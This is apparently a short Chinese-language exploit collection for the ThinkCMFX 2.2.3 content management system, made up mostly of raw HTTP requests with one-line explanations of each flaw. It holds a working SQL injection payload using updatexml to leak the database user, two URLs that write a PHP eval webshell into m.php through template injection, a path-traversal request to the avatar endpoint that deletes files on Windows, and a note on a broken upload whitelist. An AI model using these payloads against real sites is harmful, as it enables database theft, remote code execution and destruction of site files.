:
POST /ThinkCMFX/index.php?g=portal&m=article&a=edit_post HTTP/1.1
Host: localhost
Connection: close
Cookie: PHPSESSID=kcg5v82ms3v13o8pgrhh9saj95
Content-Type: application/x-www-form-urlencoded
Content-Length: 79
post[id][0]=bind&post[id][1]=0 and updatexml(1, concat(0x7e,user(),0x7e),1)--+-
原因:没有过滤post请求中的post参数
:
# 第一处
http://website/ThinkCMFX/index.php?g=Comment&m=Widget&a=fetch&templateFile=/../public/index&content=<%3fphp+file_put_contents('m.php','<%3fphp+eval($_POST[_])%3b');?>&prefix=
# 第二处
http://website/ThinkCMFX/index.php?g=Api&m=Plugin&a=fetch&templateFile=/../../../public/index&content=<%3fphp+file_put_contents('m.php','<%3fphp+eval($_POST[_])%3b');?>&prefix=
原因:程序未对模板文件名进行过滤,且接口权限控制不严。在模板名可控、文件内容可控的情况下,我们可以将 webshell 写入缓存文件,然后框架会去包含缓存文件,这样就成功执行了 webshell 。还有一个问题是该漏洞仅能在 Windows 下触发,原因是windows中允许/…/public 这种格式的存在
POST /ThinkCMFX/index.php?g=User&m=Profile&a=do_avatar& HTTP/1.1
Host: localhost
Cookie: PHPSESSID=bggit7phrb1dl99pcb2lagbmq0;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 27
imgurl=..\..\..\mochazz.txt
原因:每次上传头像后, ThinkCMFX2.2.3 将新的头像地址写入数据库,并将先前的头像删除。程序这里对符号 / 进行了过滤,就是为了防止路径穿越问题。然而在 Windows 下,却允许 …\头像文件 这种写法,所以也是为什么这个漏洞仅在 Windows 下可利用。
原因:$allowed_exts=explode(’,’, $upload_setting[$filetype][‘extensions’]); ,这就导致了白名单规则失效。这里错误的写法,会导致 $allowed_exts 为 null 。
漏洞分析请参考:https://mochazz.github.io/2019/07/25/ThinkCMFX漏洞分析合集/